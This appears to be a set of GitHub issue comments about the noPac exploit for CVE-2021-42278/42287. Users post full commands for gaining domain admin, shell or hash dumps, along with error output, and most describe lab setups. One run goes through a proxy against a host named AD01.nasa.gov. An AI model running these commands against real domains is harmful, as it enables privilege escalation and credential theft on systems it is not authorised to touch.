Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user

Hello, I got this error when I try to execute this command :

python3 noPac.py lgds.local/alex.henry:'123+aze' -dc-ip 192.168.130.100 -dc-host dc -shell --impersonate root2 -use-ldap

target system : Windows Server 2022 (Sept 2021)

Strange, because I have a smb share on this target lab.

Have you any idea to resolv this issue ?

Best regards,

Hello, I got this error when I try to execute this command :

python3 noPac.py lgds.local/alex.henry:'123+aze' -dc-ip 192.168.130.101 -dc-host dc-ws16 -shell --impersonate root2 -use-ldap

target system : Windows Server 2016 (Build version : 14393.1884 )

Strange, because I have a smb share on this target lab, and ADDS/DNS rôles (linked to my lab domain)

Windows Defender does not flag nothing....

Lab configuration :

dc.lgds.local (ws22) : 192.168.130.100 dc-ws16.lgds.local (ws16) : 192.168.130.101 kali linux : 192.168.130.128

Have you got any idea ?

Best regards,

my domain looks like this: sub1.sub0.domain.com guess the issue might be in this line: 109 check_domain = ".".join(domain_dumper.getRoot().replace("DC=","").split(","))

Good afternoon,

Everything was working properly yesterday.. today I got the following error:

─$ python3 noPac.py 'domain.local'/user:'password' -dc-ip 172.16.2.x -dc-host dc-hostname --impersonate administrator -dump -use-ldap -debug

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
                                           
                                        
    
[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.9/site-packages/impacket
Traceback (most recent call last):
  File "/home/kali/Toys/noPac/noPac.py", line 385, in <module>
    samtheadmin(username, password, domain, options)
  File "/home/kali/Toys/noPac/noPac.py", line 95, in samtheadmin
    ldap_server, ldap_session = init_ldap_session(options, domain, username, password, lmhash, nthash)
  File "/home/kali/Toys/noPac/utils/helper.py", line 255, in init_ldap_session
    return init_ldap_connection(target, args.use_ldap, args, domain, username, password, lmhash, nthash)
  File "/home/kali/Toys/noPac/utils/helper.py", line 242, in init_ldap_connection
    ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True)
  File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 321, in __init__
    self.do_auto_bind()
  File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 338, in do_auto_bind
    self.bind(read_server_info=True)
  File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 563, in bind
    response = self.do_ntlm_bind(controls)
  File "/usr/local/lib/python3.9/dist-packages/ldap3/core/connection.py", line 1302, in do_ntlm_bind
    request = bind_operation(self.version, 'SICILY_RESPONSE_NTLM', ntlm_client, result['server_creds'])
  File "/usr/local/lib/python3.9/dist-packages/ldap3/operation/bind.py", line 81, in bind_operation
    server_creds = name.create_authenticate_message()
  File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 379, in create_authenticate_message
    nt_challenge_response = self.compute_nt_response()
  File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 485, in compute_nt_response
    response_key_nt = self.ntowf_v2()
  File "/usr/local/lib/python3.9/dist-packages/ldap3/utils/ntlm.py", line 497, in ntowf_v2
    return hmac.new(password_digest, (self.user_name.upper() + self.user_domain).encode('utf-16-le')).digest()
  File "/usr/lib/python3.9/hmac.py", line 170, in new
    return HMAC(key, msg, digestmod)
  File "/usr/lib/python3.9/hmac.py", line 56, in __init__
    raise TypeError("Missing required parameter 'digestmod'.")
TypeError: Missing required parameter 'digestmod'.
[-] Missing required parameter 'digestmod'.

Running noPac against 2016 DC and receiving the following error. Tried hard-coding the machine account name and password with no success.

`└─# python3 /opt/noPac/noPac.py domain/user:'password' -dc-ip 192.168.1.12

███ ██ ██████ ██████ █████ ██████ ████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████

[*] Current ms-DS-MachineAccountQuota = 10 [*] We have more than one target, Pls choices the hostname of the -dc-ip you input. [*] 0: dc1 [*] 1: dc2

Your choice: 0 [*] Selected Target dc1.domain.local [*] Total Domain Admins 7 [*] will try to impersonat admin [*] Adding Computer Account "WIN-AJKEBM3GBHT" [*] MachineAccount "WIN-AJKEBM3GBHT" password = j2ZLU0Y@7uOL [-] SAMR SessionError: code: 0xc0000062 - STATUS_INVALID_ACCOUNT_NAME - The name provided is not a properly formed account name.`

在08，12域控上测试，查找具备修改的用户，测试失败：

C:\Users\Administrator\Desktop>AdFind.exe -b "CN=Computers,DC=xxx,DC=com" -sc g etacls -sddlfilter ;;"[WRT PROP]";;computer;xxx\test -recmute

AdFind V01.52.00cpp Joe Richards ([email protected]) January 2020

Using server: AD.xxx.com:389 Directory: Windows Server 2012 R2

dn:CN=win7,CN=Computers,DC=xxx,DC=com

nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];Logon Information;computer;B OSS\test nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];description;computer;xxx\te st nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];displayName;computer;xxx\te st nTSecurityDescriptor: [DACL] OBJ ALLOW;;[WRT PROP];sAMAccountName;computer;xxx \test

python.exe nopac.py xxx.com/test:Admin123 -dc-ip 192.168.xxx.xxx -dc-host ad.xxx.com --impersonate administrator -no-add -new-name win7$ -use-ldap

[*] Current ms-DS-MachineAccountQuota = 0 [*] win7$ already exists! Using force mode. {'attributes': {'ms-DS-MachineAccountQuota': [], 'objectSid': ['S-1-5-21-722558688-90111164-1262859035-2608']}, 'dn': 'CN=win7,CN=Computers,DC=xxx,DC=com'} {'result': 53, 'description': 'unwillingToPerform', 'dn': '', 'message': '0000001F: SvcErr: DSID-031A12D2, problem 5003 (WILL_NOT_PERFORM), data 0\n\x00', 'referrals': None, 'type': 'modifyResponse'} [-] Cannot change the machine password , exit.

计算机用户、域用户 需要做特别的设置？

Hi Thanks for the upload, I tried different user but get same error.

PS C:\tools\NOPAC\noPac-main\noPac-main> python noPac.py contoso.com/user01:'P@ssw0rd' -dc-ip 192.168.200.100

automatic bind not successful - invalidCredentials

Include uppercase variant of 'domain' in conditional on line 100 since 'namingcontexts' for 'DC=*' via ldap reply is in uppercase. I figure this line is 'script kiddie proof', and may also teach those learning the industry(such as myself) to diagnose why a tool isn't working. I figured it wouldn't hurt to suggest it. Awesome tool, by the way.

When i try to exploit Active Directory it return these error. I use kali linux 2021. Please help....

GetTGT error, error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Running noPac against 2019 DC and receiving the following error #:proxychains4 python3 noPac.py xxx/user:'password' -dc-ip 10.10.10.140 -dc-host ad01 -shell --impersonate administrator
[proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/lib/libproxychains4.so [proxychains] DLL init: proxychains-ng 4.16-git-4-g04023d3

███ ██ ██████ ██████ █████ ██████ ████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████

[proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:389 ... OK [*] Current ms-DS-MachineAccountQuota = 10 [*] Selected Target AD01.nasa.gov [*] will try to impersonat administrator [*] Adding Computer Account "WIN-GQ5YXH1Y39S$" [*] MachineAccount "WIN-GQ5YXH1Y39S$" password = ^%rX!ZNIV#0v [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:135 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.10.140:445 ... OK [-] SAMR SessionError: code: 0xc00002a7 - STATUS_DS_NO_RIDS_ALLOCATED - The directory service was unable to allocate a relative identifier.